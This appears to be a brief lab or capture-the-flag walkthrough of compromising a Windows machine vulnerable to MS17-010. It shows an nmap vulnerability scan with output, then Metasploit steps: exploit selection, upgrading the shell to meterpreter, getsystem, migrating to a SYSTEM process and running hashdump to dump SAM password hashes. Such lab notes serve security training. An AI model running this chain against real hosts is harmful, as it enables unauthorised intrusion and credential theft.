Recon
- scan for open ports
nmap -vv -sV --script vuln <ip>
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
...
Gain Access
- start metasploit
- search for exploit
- use
<path to exploit>
- set
RHOSTS
- set payload
Escalate
- convert shell to meterpreter
- background session, ctrl z
use post/multi/manage/shell_to_meterpreter
- set required options
- run
- run
getsystem
to check privileges - run
shell
to create new shell - check list of running process, does service have system level privs?
- migrate to process that has system privilege
migrate <process id>
- once higher process is controlled
- run
hashdump
, displays password hashes store din SAM database